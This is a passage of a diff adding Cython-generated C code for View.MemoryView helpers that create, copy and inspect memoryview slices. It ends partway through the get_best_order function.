*)__pyx_v_memviewslice.memview) == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":1008 + * + * if memviewslice.memview == Py_None: + * return None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + } + + /* "View.MemoryView":1013 + * + * + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) # <<<<<<<<<<<<<< + * + * result.from_slice = memviewslice + */ + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_3, 0, Py_None); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_int_0); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_2 = 0; + __pyx_t_2 = ((PyObject *)__pyx_tp_new__memoryviewslice(((PyTypeObject *)__pyx_memoryviewslice_type), __pyx_t_3, NULL)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1015 + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) + * + * result.from_slice = memviewslice # <<<<<<<<<<<<<< + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + */ + __pyx_v_result->from_slice = __pyx_v_memviewslice; + + /* "View.MemoryView":1016 + * + * result.from_slice = memviewslice + * __PYX_INC_MEMVIEW(&memviewslice, 1) # <<<<<<<<<<<<<< + * + * result.from_object = ( memviewslice.memview)._get_base() + */ + __PYX_INC_MEMVIEW((&__pyx_v_memviewslice), 1); + + /* "View.MemoryView":1018 + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + * result.from_object = ( memviewslice.memview)._get_base() # <<<<<<<<<<<<<< + * result.typeinfo = memviewslice.memview.typeinfo + * + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->__pyx_vtab)->_get_base(((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1018, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_result->from_object); + __Pyx_DECREF(__pyx_v_result->from_object); + __pyx_v_result->from_object = __pyx_t_2; + __pyx_t_2 = 0; + + /* "View.MemoryView":1019 + * + * result.from_object = ( memviewslice.memview)._get_base() + * result.typeinfo = memviewslice.memview.typeinfo # <<<<<<<<<<<<<< + * + * result.view = memviewslice.memview.view + */ + __pyx_t_4 = __pyx_v_memviewslice.memview->typeinfo; + __pyx_v_result->__pyx_base.typeinfo = __pyx_t_4; + + /* "View.MemoryView":1021 + * result.typeinfo = memviewslice.memview.typeinfo + * + * result.view = memviewslice.memview.view # <<<<<<<<<<<<<< + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + */ + __pyx_t_5 = __pyx_v_memviewslice.memview->view; + __pyx_v_result->__pyx_base.view = __pyx_t_5; + + /* "View.MemoryView":1022 + * + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data # <<<<<<<<<<<<<< + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + */ + __pyx_v_result->__pyx_base.view.buf = ((void *)__pyx_v_memviewslice.data); + + /* "View.MemoryView":1023 + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data + * result.view.ndim = ndim # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_v_result->__pyx_base.view.ndim = __pyx_v_ndim; + + /* "View.MemoryView":1024 + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_result->__pyx_base.view))->obj = Py_None; + + /* "View.MemoryView":1025 + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # <<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + __pyx_t_1 = ((((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1028 + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + * result.flags = PyBUF_RECORDS # <<<<<<<<<<<<<< + * else: + * result.flags = PyBUF_RECORDS_RO + */ + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS; + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # <<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1030 + * result.flags = PyBUF_RECORDS + * else: + * result.flags = PyBUF_RECORDS_RO # <<<<<<<<<<<<<< + * + * result.view.shape = result.from_slice.shape + */ + /*else*/ { + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS_RO; + } + __pyx_L4:; + + /* "View.MemoryView":1032 + * result.flags = PyBUF_RECORDS_RO + * + * result.view.shape = result.from_slice.shape # <<<<<<<<<<<<<< + * result.view.strides = result.from_slice.strides + * + */ + __pyx_v_result->__pyx_base.view.shape = ((Py_ssize_t *)__pyx_v_result->from_slice.shape); + + /* "View.MemoryView":1033 + * + * result.view.shape = result.from_slice.shape + * result.view.strides = result.from_slice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_result->__pyx_base.view.strides = ((Py_ssize_t *)__pyx_v_result->from_slice.strides); + + /* "View.MemoryView":1036 + * + * + * result.view.suboffsets = NULL # <<<<<<<<<<<<<< + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + */ + __pyx_v_result->__pyx_base.view.suboffsets = NULL; + + /* "View.MemoryView":1037 + * + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + */ + __pyx_t_7 = (__pyx_v_result->from_slice.suboffsets + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->from_slice.suboffsets; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_v_suboffset = (__pyx_t_6[0]); + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + __pyx_t_1 = (__pyx_v_suboffset >= 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1039 + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_result->__pyx_base.view.suboffsets = ((Py_ssize_t *)__pyx_v_result->from_slice.suboffsets); + + /* "View.MemoryView":1040 + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + * break # <<<<<<<<<<<<<< + * + * result.view.len = result.view.itemsize + */ + goto __pyx_L6_break; + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + } + } + __pyx_L6_break:; + + /* "View.MemoryView":1042 + * break + * + * result.view.len = result.view.itemsize # <<<<<<<<<<<<<< + * for length in result.view.shape[:ndim]: + * result.view.len *= length + */ + __pyx_t_9 = __pyx_v_result->__pyx_base.view.itemsize; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + + /* "View.MemoryView":1043 + * + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: # <<<<<<<<<<<<<< + * result.view.len *= length + * + */ + __pyx_t_7 = (__pyx_v_result->__pyx_base.view.shape + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->__pyx_base.view.shape; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_6[0])); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1043, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1044 + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: + * result.view.len *= length # <<<<<<<<<<<<<< + * + * result.to_object_func = to_object_func + */ + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_result->__pyx_base.view.len); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_InPlaceMultiply(__pyx_t_2, __pyx_v_length); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_3); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + } + + /* "View.MemoryView":1046 + * result.view.len *= length + * + * result.to_object_func = to_object_func # <<<<<<<<<<<<<< + * result.to_dtype_func = to_dtype_func + * + */ + __pyx_v_result->to_object_func = __pyx_v_to_object_func; + + /* "View.MemoryView":1047 + * + * result.to_object_func = to_object_func + * result.to_dtype_func = to_dtype_func # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->to_dtype_func = __pyx_v_to_dtype_func; + + /* "View.MemoryView":1049 + * result.to_dtype_func = to_dtype_func + * + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_fromslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_mslice) { + struct __pyx_memoryviewslice_obj *__pyx_v_obj = 0; + __Pyx_memviewslice *__pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_slice_from_memview", 0); + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1056 + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): + * obj = memview # <<<<<<<<<<<<<< + * return &obj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 1056, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_obj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1057 + * if isinstance(memview, _memoryviewslice): + * obj = memview + * return &obj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, mslice) + */ + __pyx_r = (&__pyx_v_obj->from_slice); + goto __pyx_L0; + + /* "View.MemoryView":1055 + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * obj = memview + * return &obj.from_slice + */ + } + + /* "View.MemoryView":1059 + * return &obj.from_slice + * else: + * slice_copy(memview, mslice) # <<<<<<<<<<<<<< + * return mslice + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, __pyx_v_mslice); + + /* "View.MemoryView":1060 + * else: + * slice_copy(memview, mslice) + * return mslice # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_slice_copy') + */ + __pyx_r = __pyx_v_mslice; + goto __pyx_L0; + } + + /* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.get_slice_from_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_obj); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_dst) { + int __pyx_v_dim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + Py_ssize_t *__pyx_v_suboffsets; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + Py_ssize_t __pyx_t_5; + __Pyx_RefNannySetupContext("slice_copy", 0); + + /* "View.MemoryView":1067 + * cdef (Py_ssize_t*) shape, strides, suboffsets + * + * shape = memview.view.shape # <<<<<<<<<<<<<< + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets + */ + __pyx_t_1 = __pyx_v_memview->view.shape; + __pyx_v_shape = __pyx_t_1; + + /* "View.MemoryView":1068 + * + * shape = memview.view.shape + * strides = memview.view.strides # <<<<<<<<<<<<<< + * suboffsets = memview.view.suboffsets + * + */ + __pyx_t_1 = __pyx_v_memview->view.strides; + __pyx_v_strides = __pyx_t_1; + + /* "View.MemoryView":1069 + * shape = memview.view.shape + * strides = memview.view.strides + * suboffsets = memview.view.suboffsets # <<<<<<<<<<<<<< + * + * dst.memview = <__pyx_memoryview *> memview + */ + __pyx_t_1 = __pyx_v_memview->view.suboffsets; + __pyx_v_suboffsets = __pyx_t_1; + + /* "View.MemoryView":1071 + * suboffsets = memview.view.suboffsets + * + * dst.memview = <__pyx_memoryview *> memview # <<<<<<<<<<<<<< + * dst.data = memview.view.buf + * + */ + __pyx_v_dst->memview = ((struct __pyx_memoryview_obj *)__pyx_v_memview); + + /* "View.MemoryView":1072 + * + * dst.memview = <__pyx_memoryview *> memview + * dst.data = memview.view.buf # <<<<<<<<<<<<<< + * + * for dim in range(memview.view.ndim): + */ + __pyx_v_dst->data = ((char *)__pyx_v_memview->view.buf); + + /* "View.MemoryView":1074 + * dst.data = memview.view.buf + * + * for dim in range(memview.view.ndim): # <<<<<<<<<<<<<< + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + */ + __pyx_t_2 = __pyx_v_memview->view.ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_dim = __pyx_t_4; + + /* "View.MemoryView":1075 + * + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] # <<<<<<<<<<<<<< + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + */ + (__pyx_v_dst->shape[__pyx_v_dim]) = (__pyx_v_shape[__pyx_v_dim]); + + /* "View.MemoryView":1076 + * for dim in range(memview.view.ndim): + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] # <<<<<<<<<<<<<< + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 + * + */ + (__pyx_v_dst->strides[__pyx_v_dim]) = (__pyx_v_strides[__pyx_v_dim]); + + /* "View.MemoryView":1077 + * dst.shape[dim] = shape[dim] + * dst.strides[dim] = strides[dim] + * dst.suboffsets[dim] = suboffsets[dim] if suboffsets else -1 # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object') + */ + if ((__pyx_v_suboffsets != 0)) { + __pyx_t_5 = (__pyx_v_suboffsets[__pyx_v_dim]); + } else { + __pyx_t_5 = -1L; + } + (__pyx_v_dst->suboffsets[__pyx_v_dim]) = __pyx_t_5; + } + + /* "View.MemoryView":1063 + * + * @cname('__pyx_memoryview_slice_copy') + * cdef void slice_copy(memoryview memview, __Pyx_memviewslice *dst) noexcept: # <<<<<<<<<<<<<< + * cdef int dim + * cdef (Py_ssize_t*) shape, strides, suboffsets + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *__pyx_v_memview) { + __Pyx_memviewslice __pyx_v_memviewslice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy", 0); + + /* "View.MemoryView":1083 + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) # <<<<<<<<<<<<<< + * return memoryview_copy_from_slice(memview, &memviewslice) + * + */ + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_memviewslice)); + + /* "View.MemoryView":1084 + * cdef __Pyx_memviewslice memviewslice + * slice_copy(memview, &memviewslice) + * return memoryview_copy_from_slice(memview, &memviewslice) # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_object_from_slice') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_memoryview_copy_object_from_slice(__pyx_v_memview, (&__pyx_v_memviewslice)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1084, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1080 + * + * @cname('__pyx_memoryview_copy_object') + * cdef memoryview_copy(memoryview memview): # <<<<<<<<<<<<<< + * "Create a new memoryview object" + * cdef __Pyx_memviewslice memviewslice + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + +static PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_memviewslice) { + PyObject *(*__pyx_v_to_object_func)(char *); + int (*__pyx_v_to_dtype_func)(char *, PyObject *); + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *(*__pyx_t_2)(char *); + int (*__pyx_t_3)(char *, PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy_from_slice", 0); + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1095 + * + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func # <<<<<<<<<<<<<< + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + */ + __pyx_t_2 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_object_func; + __pyx_v_to_object_func = __pyx_t_2; + + /* "View.MemoryView":1096 + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func # <<<<<<<<<<<<<< + * else: + * to_object_func = NULL + */ + __pyx_t_3 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_dtype_func; + __pyx_v_to_dtype_func = __pyx_t_3; + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1098 + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + * to_object_func = NULL # <<<<<<<<<<<<<< + * to_dtype_func = NULL + * + */ + /*else*/ { + __pyx_v_to_object_func = NULL; + + /* "View.MemoryView":1099 + * else: + * to_object_func = NULL + * to_dtype_func = NULL # <<<<<<<<<<<<<< + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + */ + __pyx_v_to_dtype_func = NULL; + } + __pyx_L3:; + + /* "View.MemoryView":1101 + * to_dtype_func = NULL + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, # <<<<<<<<<<<<<< + * to_object_func, to_dtype_func, + * memview.dtype_is_object) + */ + __Pyx_XDECREF(__pyx_r); + + /* "View.MemoryView":1103 + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + * to_object_func, to_dtype_func, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_memoryview_fromslice((__pyx_v_memviewslice[0]), __pyx_v_memview->view.ndim, __pyx_v_to_object_func, __pyx_v_to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_from_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + +static Py_ssize_t abs_py_ssize_t(Py_ssize_t __pyx_v_arg) { + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + + /* "View.MemoryView":1110 + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: + * return -arg if arg < 0 else arg # <<<<<<<<<<<<<< + * + * @cname('__pyx_get_best_slice_order') + */ + if ((__pyx_v_arg < 0)) { + __pyx_t_1 = (-__pyx_v_arg); + } else { + __pyx_t_1 = __pyx_v_arg; + } + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + +static char __pyx_get_best_slice_order(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim) { + int __pyx_v_i; + Py_ssize_t __pyx_v_c_stride; + Py_ssize_t __pyx_v_f_stride; + char __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1118 + * """ + * cdef int i + * cdef Py_ssize_t c_stride = 0 # <<<<<<<<<<<<<< + * cdef Py_ssize_t f_stride = 0 + * + */ + __pyx_v_c_stride = 0; + + /* "View.MemoryView":1119 + * cdef int i + * cdef Py_ssize_t c_stride = 0 + * cdef Py_ssize_t f_stride = 0 # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_f_stride = 0; + + /* "View.MemoryView":1121 + * cdef Py_ssize_t f_stride = 0 + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1123 + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_c_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1124 + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + goto __pyx_L4_break; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L4_break:; + + /* "View.MemoryView":1126 + * break + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + */ + __pyx_t_1 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_1; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = 